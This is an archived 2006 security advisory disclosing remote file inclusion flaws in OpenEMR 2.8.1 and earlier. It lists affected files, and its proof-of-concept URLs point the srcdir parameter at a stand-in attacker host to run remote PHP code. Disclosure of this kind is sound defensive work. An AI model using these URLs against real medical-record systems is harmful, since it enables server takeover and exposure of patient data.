exploit the possibilities

Echo Security Advisory 2006.60

Echo Security Advisory 2006.60
Posted Nov 7, 2006
Authored by Echo Security, the_day | Site advisories.echo.or.id

OpenEMR versions 2.8.1 and below suffer from multiple remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, file inclusion
MD5 | 15419ef746e1a4cb2b4b0656c06a5dd1

Echo Security Advisory 2006.60

Change Mirror Download
____________________   ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_60$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_60$2006] OpenEMR <=2.8.1 Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author : Dedi Dwianto a.k.a the_day
Date Found : November, 01nd 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv60-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : OpenEMR
version : <=2.8.1
URL : http://www.oemr.org

OpenEMR is Open Source electronic medical record and medical practice management software.
OpenEMR is best described as a "system" of programs. The main OpenEMR program consists of the electronic
health records and scheduling software.
OpenEMR can also be configured for insurance billing with FreeB, accounting with SQL-Ledger,
and access controls with php-GACL.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

I found vulnerability in interface/billing/billing_process.php
-----------------------interface/billing/billing_process.php-------------
....
<?
...
include_once("$srcdir/patient.inc");
include_once("$srcdir/billrep.inc");
...
----------------------------------------------------------

Input passed to the "$srcdir" parameter in billing_process.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.


Also affected files :

interface/billing/billing_report.php
interface/billing/billing_report_xml.php
interface/billing/print_billing_report.php
login.php
interface/batchcom/batchcom.php
interface/login/login.php
interface/main/main_info.php
interface/main/main.php
interface/new/new_patient_save.php
interface/practice/ins_search.php
interface/logout.php
interface/reports/custom_report_range.php
interface/reports/players_report.php
interface/reports/front_receipts_report.php
interface/usergroup/facility_admin.php
interface/usergroup/usergroup_admin.php
interface/usergroup/user_info.php
interface/usergroup/facility_admin.php
interface/usergroup/facility_admin.php
custom/import_xml.php

New Vulnerability in OpenEMR Version 2.8.1
----library/translation.inc.php----
<?
....
include_once($GLOBALS['srcdir'] . '/sql.inc');
....
?>

Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[OpenEMR-path]/interface/billing/billing_process.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/interface/new/new_patient_save.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/login.php?srcdir=http://atacker.com/inject.txt?
http://target.com/[OpenEMR-path]/library/translation.inc.php?GLOBALS[srcdir]=http://atacker.com/inject.txt?



Solution:
~~~~~~

- Sanitize variable $srcdir affected files.
- Turn off register_globals

Timeline :
~~~~~~~~

01 - 11 - 2006 bugs found
01 - 11 - 2006 vendor contacted
07 - 11 - 2006 public disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
EcHo Research & Development Center
the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------


Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    14 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close